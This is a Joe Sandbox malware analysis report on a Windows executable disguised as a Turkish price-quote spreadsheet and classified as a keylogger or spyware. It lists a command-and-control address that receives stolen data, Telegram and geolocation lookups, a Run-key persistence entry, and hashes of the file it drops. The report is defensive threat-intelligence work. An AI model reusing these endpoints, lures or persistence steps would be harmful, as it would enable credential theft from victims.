                          https://stackoverflow.com/q/11564914/23354;TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://stackoverflow.com/q/2152978/23354TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2061637141.00000000057F0000.00000004.08000000.00040000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://checkip.dyndns.org/qTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://chrome.google.com/webstore?hl=enlBInstallUtil.exe, 00000002.00000002.4496377708.0000000002C3D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002BCC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002F5E000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            https://reallyfreegeoip.orgInstallUtil.exe, 00000002.00000002.4496377708.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002B67000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DF0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002E60000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.0000000003557000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2043823101.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2164548814.0000000003714000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A11000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2251979049.0000000002A40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=InstallUtil.exe, 00000002.00000002.4509339430.0000000003AA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4509605645.0000000003A33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4508776850.0000000003DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedTEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://reallyfreegeoip.org/xml/TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.000000000438E000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.2060044742.00000000041D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4496377708.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.00000000043E7000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000003.00000002.2175629104.000000000446B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4490658108.0000000000434000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.4496902509.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Tojeiuai.exe, 00000006.00000002.2272906135.000000000380B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.4495336578.0000000002DF0000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            		api.telegram.orgUnited Kingdom
                            		62041TELEGRAMRUtrue
                            188.114.97.3
                            		reallyfreegeoip.orgEuropean Union
                            		13335CLOUDFLARENETUStrue
                            158.101.44.242
                            		checkip.dyndns.comUnited States
                            		31898ORACLE-BMC-31898USfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528904
                            Start date and time:2024-10-08 12:44:06 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:10
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                            renamed because original name is a hash value
                            Original Sample Name:TEKLF TALEP VE FYAT TEKLF_xlsx.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@8/2@3/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 96%
                            • Number of executed functions: 456
                            • Number of non-executed functions: 36
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            06:44:58API Interceptor15475130x Sleep call for process: InstallUtil.exe modified
                            12:44:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Tojeiuai C:\Users\user\AppData\Roaming\Tojeiuai.exe
                            12:45:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Tojeiuai C:\Users\user\AppData\Roaming\Tojeiuai.exe

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            149.154.167.220SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                              NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                  QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                    PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                      Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                        RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                              EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                188.114.97.3scan_374783.jsGet hashmaliciousAgentTeslaBrowse
                                                • paste.ee/d/gvOd3
                                                IRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                • www.bayarcepat19.click/yuvr/
                                                Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                • www.cc101.pro/0r21/
                                                http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                • filetransfer.io/data-package/eZFzMENr/download
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/MlZtCPkK/download
                                                https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                • mairie-espondeilhan.com/
                                                QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • filetransfer.io/data-package/758bYd86/download
                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                • filetransfer.io/data-package/58PSl7si/download
                                                QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                • filetransfer.io/data-package/58PSl7si/download
                                                158.101.44.242rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                Justificante de pago.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                PO.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                #Uc740#Ud589_#Uc0c1#Uc138#Uc815#Ubcf4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                sam.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                • checkip.dyndns.org/
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                MT103-93850.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                StatementXofXaccount.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/
                                                z1PurchaseOrder.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                • checkip.dyndns.org/

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                reallyfreegeoip.orgSiparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.96.3
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.96.3
                                                EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                checkip.dyndns.comSiparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                PO.L0009316.Pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.6.168
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.247.73
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.6.168
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.8.169
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.8.169
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 193.122.130.0
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 132.226.247.73
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 158.101.44.242
                                                api.telegram.orgSecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TELEGRAMRUSecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                VmRHSCaiyc.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 149.154.167.99
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                CLOUDFLARENETUShttps://u9313450.ct.sendgrid.net/ls/click?upn=u001.ZfA-2BqTl2mXIVteOCc-2BANg3DC2QYjSoauaoyveU6MGzQ5VY-2FjA-2F-2FRincDy1KlklBXiPJP_QABV8lal1FXq8md0G3-2FIRFNEx2OV-2FLWSv5ByAZvXcaLdzn8wfCvTlDds0ovRZhRFzHNfaxKr2UfovDpEFdLigcTlhUu24CyUOQvOCn6w-2BHb3x6-2BV4Gc9geo2lLTncL6JUMk6T71-2BqjLFsmgG-2BXpvetiYOby06i5CliURFDYqQTT1C2IqhXHNpvN85ZEXfc5YBJaPCdYG7GCx3syxYrFYTqrHhY55-2BpbwTxDCwDN1-2BlowHglPUt5r1G9-2FvJEFg-2F5ssADCqEBOqtEhmmm5GgEypOrZiDwmybFJCcbqY1CFgUEEhAhZH7kmvwleWNlpfoBdGet hashmaliciousUnknownBrowse
                                                • 104.17.246.203
                                                PURCHASED ORDER OF ENG091.exeGet hashmaliciousFormBookBrowse
                                                • 104.21.93.17
                                                http://nbxvavlbbnks0ockyfxgnbxva.feedbackfusion.site/4nbXVA123415bxwz821wfgqkoqbno9030GRUYZVSMVMDWDTG236348/3210Y21Get hashmaliciousUnknownBrowse
                                                • 104.22.51.98
                                                file.exeGet hashmaliciousLummaCBrowse
                                                • 104.21.53.8
                                                Siparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                https://we.tl/t-BVtGtb0HLzGet hashmaliciousUnknownBrowse
                                                • 104.17.25.14
                                                na.elfGet hashmaliciousUnknownBrowse
                                                • 104.28.142.242
                                                Message_2551600.emlGet hashmaliciousUnknownBrowse
                                                • 1.1.1.1
                                                na.elfGet hashmaliciousUnknownBrowse
                                                • 104.16.244.186
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.96.3
                                                ORACLE-BMC-31898USSiparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                PO.L0009316.Pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.6.168
                                                Order.docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 193.122.130.0
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 193.122.130.0
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 158.101.44.242
                                                Justificante de pago.exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 158.101.44.242
                                                XvAqhy3FO6.elfGet hashmaliciousMirai, OkiruBrowse
                                                • 150.136.104.146
                                                RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 193.122.6.168
                                                z1PO7311145.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 158.101.44.242

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                54328bd36c14bd82ddaa0c04b25ed9adSiparis PO# DT-TE-160924R0 _323282-_563028621286 pdf .exeGet hashmaliciousSnake KeyloggerBrowse
                                                • 188.114.97.3
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.97.3
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                Urgent inquiry for quotation .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                rPedidoactualizado.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 188.114.97.3
                                                EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 188.114.97.3
                                                https://s.craft.me/yB5midhwwaHUPWGet hashmaliciousHTMLPhisherBrowse
                                                • 188.114.97.3
                                                3b5074b1b5d032e5620f69f9f700ff0eSecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                NXPYoHNSgv.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                SWIFT 103 202410071519130850 071024.pdf.vbsGet hashmaliciousRemcosBrowse
                                                • 149.154.167.220
                                                QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                po 1105670313_pdf.vbsGet hashmaliciousUnknownBrowse
                                                • 149.154.167.220
                                                PO_89_202876.Pdf.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220
                                                QUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                shipping.exeGet hashmaliciousAgentTeslaBrowse
                                                • 149.154.167.220
                                                Contrato de Cesin de Crditos Sin Recurso.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                • 149.154.167.220
                                                RFQ PAL-10GN SN 2001964_xls.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 149.154.167.220

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\Roaming\Tojeiuai.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2394624
                                                Entropy (8bit):7.083256086733377
                                                Encrypted:false
                                                SSDEEP:24576:wLQ4ptMQJ/FlikzQjbrf5k+OhMAYg+BFe73DXiAeBHYGnUjkuxx/d//6e:w7lCbrRkHhMRTi3DXiAJeUndH
                                                MD5:1E9DC5041BF503CB63397E6A8F0BAE9A
                                                SHA1:9D21FE92EE433BE3BE4C09F8D242B4AD87D2158C
                                                SHA-256:E918F19D7627B7FA623F669351F2E00E029FA71BF08082C527DA5B88EC53B9DC
                                                SHA-512:D377B79A8220426EAFAFAC5A9E9FAAF8DC556DBF0AC545E485ECEE2D3BDAB6100EEE6416C104DB8F6C847D5672F2CFF92612AD989A8FCF36F147C357DB100CBB
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 34%
                                                • Antivirus: Virustotal, Detection: 42%, Browse
                                                Reputation:low
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................~$..........$.. ....$...@.. ........................$...........`...................................$.K.....$.@.....................$...................................................... ............... ..H............text....|$.. ...~$................. ..`.rsrc...@.....$.......$.............@..@.reloc........$.......$.............@..B.................$.....H...........47......0...$...,y...........................................*...(....*...(....*.0../....... ........8........E*.......8...............J.......t...............g...l...........................]...........~...'...'...........8...I...............X.......W.......Z...........;.......=...8|....(....9\... ....89.....e...YY#.........ZCJ... ....8......#........C.... ....8.......X.. ....8....... ....8.......(....*....l[*..@.... ....~Q...{....:....& ....8......(....9\... ..

                                                C:\Users\user\AppData\Roaming\Tojeiuai.exe:Zone.Identifier

                                                Download File
                                                Process:C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:[ZoneTransfer]....ZoneId=0

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.083256086733377
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                                                File size:2'394'624 bytes
                                                MD5:1e9dc5041bf503cb63397e6a8f0bae9a
                                                SHA1:9d21fe92ee433be3be4c09f8d242b4ad87d2158c
                                                SHA256:e918f19d7627b7fa623f669351f2e00e029fa71bf08082c527da5b88ec53b9dc
                                                SHA512:d377b79a8220426eafafac5a9e9faaf8dc556dbf0ac545e485ecee2d3bdab6100eee6416c104db8f6c847d5672f2cff92612ad989a8fcf36f147c357db100cbb
                                                SSDEEP:24576:wLQ4ptMQJ/FlikzQjbrf5k+OhMAYg+BFe73DXiAeBHYGnUjkuxx/d//6e:w7lCbrRkHhMRTi3DXiAJeUndH
